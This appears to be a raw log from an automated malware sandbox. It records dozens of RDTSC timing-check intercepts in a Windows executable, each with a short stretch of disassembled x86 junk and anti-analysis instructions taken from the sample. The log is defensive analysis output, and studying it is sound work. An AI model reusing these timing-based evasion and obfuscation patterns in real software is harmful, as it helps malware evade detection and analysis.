Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E59201 second address: E59205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5D0DA second address: E5D162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F4BA0D39708h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov di, C9A0h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov edi, 4862E83Ah 0x0000003b mov eax, dword ptr [ebp+122D0A21h] 0x00000041 jmp 00007F4BA0D39710h 0x00000046 push FFFFFFFFh 0x00000048 push eax 0x00000049 add bx, 3F2Bh 0x0000004e pop ebx 0x0000004f nop 0x00000050 pushad 0x00000051 jmp 00007F4BA0D39713h 0x00000056 jng 00007F4BA0D39708h 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e popad 0x0000005f push eax 0x00000060 push esi 0x00000061 pushad 0x00000062 push edx 0x00000063 pop edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5E059 second address: E5E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5E05E second address: E5E075 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F4BA0D3970Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5FF6E second address: E5FF78 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D3F15Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5FF78 second address: E5FF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5FF85 second address: E5FF8F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5FF8F second address: E5FF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E6313E second address: E63143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E63143 second address: E63149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E63149 second address: E6315F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F15Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E6315F second address: E63164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E601EC second address: E601F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E62249 second address: E6224F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E6224F second address: E62253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E650C5 second address: E65112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F4BA0D39713h 0x0000000c popad 0x0000000d jmp 00007F4BA0D39719h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4BA0D3970Ah 0x0000001b pushad 0x0000001c jnc 00007F4BA0D39706h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E65112 second address: E65117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E66811 second address: E668B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 jmp 00007F4BA0D3970Dh 0x00000015 popad 0x00000016 jmp 00007F4BA0D39716h 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F4BA0D39708h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 jmp 00007F4BA0D39711h 0x0000003c mov dword ptr [ebp+122D280Dh], ebx 0x00000042 push 00000000h 0x00000044 mov ebx, 2259C726h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F4BA0D39708h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D1F09h], esi 0x0000006b xchg eax, esi 0x0000006c push ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F4BA0D39706h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E658EC second address: E658F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E67A2E second address: E67A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E67A32 second address: E67A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F163h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E66B54 second address: E66B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39710h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E66B6C second address: E66B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E66B7A second address: E66B80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E68B25 second address: E68B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E68B2B second address: E68B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E67BC8 second address: E67BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E67BCC second address: E67BDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F4BA0D39706h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E70A53 second address: E70A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E70A58 second address: E70A5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E70E41 second address: E70E4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E75581 second address: E75587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7561F second address: E75623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7570B second address: E75750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F4BA0D39706h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F4BA0D39715h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F4BA0D39715h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E75750 second address: E75754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E75754 second address: E75758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A35D second address: E7A36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4BA0D3F156h 0x0000000a jnc 00007F4BA0D3F156h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A36E second address: E7A378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4BA0D39706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A4AA second address: E7A4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4BA0D3F156h 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A632 second address: E7A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A638 second address: E7A653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D3F162h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A653 second address: E7A65D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A792 second address: E7A7A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A7A0 second address: E7A7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4BA0D3970Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7A8E2 second address: E7A8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7AA92 second address: E7AA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7AA98 second address: E7AA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7ABD5 second address: E7ABF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D39719h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7ABF7 second address: E7ABFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7ABFD second address: E7AC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F4BA0D3971Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7AD90 second address: E7ADA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7DF48 second address: E7DF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E7DF4E second address: E7DF89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jns 00007F4BA0D3F156h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F4BA0D3F156h 0x0000001b jmp 00007F4BA0D3F15Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E14864 second address: E14868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E14868 second address: E14891 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F4BA0D3F15Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4BA0D3F163h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8342C second address: E83432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E83432 second address: E83453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F165h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F4BA0D3F156h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8202B second address: E8202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8202F second address: E82039 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E825DB second address: E825E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E825E1 second address: E825E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E82785 second address: E8278B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8278B second address: E82790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E82B91 second address: E82B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E82E80 second address: E82E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E362E6 second address: E36308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39719h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E0733D second address: E07353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E07353 second address: E07363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4BA0D39706h 0x0000000a jc 00007F4BA0D39706h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E88C95 second address: E88CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F4BA0D3F156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F4BA0D3F15Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E87AC6 second address: E87ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E87ACA second address: E87AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E87AD2 second address: E87AD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E87C39 second address: E87C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E87C3F second address: E87C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E87C43 second address: E87C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F162h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8810C second address: E88112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E88568 second address: E8856E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E889CA second address: E889F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39715h 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F4BA0D3970Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E889F3 second address: E889F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E889F8 second address: E88A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E88A05 second address: E88A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8E807 second address: E8E823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8D6CA second address: E8D6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F4BA0D3F15Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E8D6EB second address: E8D6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E560E0 second address: E56114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 js 00007F4BA0D3F159h 0x0000000f movsx ecx, dx 0x00000012 lea eax, dword ptr [ebp+12481EB9h] 0x00000018 jnp 00007F4BA0D3F15Ch 0x0000001e mov dword ptr [ebp+1246F4C0h], edx 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F4BA0D3F15Ah 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56114 second address: E56119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56119 second address: E56132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4BA0D3F156h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F4BA0D3F158h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56132 second address: E56138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E56138 second address: E5613C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5613C second address: E3576D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call dword ptr [ebp+122D1E3Bh] 0x0000000f jbe 00007F4BA0D3973Eh 0x00000015 jns 00007F4BA0D3972Eh 0x0000001b jne 00007F4BA0D3970Ah 0x00000021 jl 00007F4BA0D39748h 0x00000027 pushad 0x00000028 jmp 00007F4BA0D39719h 0x0000002d jbe 00007F4BA0D39706h 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 push edx 0x00000036 pop edx 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: E5678A second address: E56790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
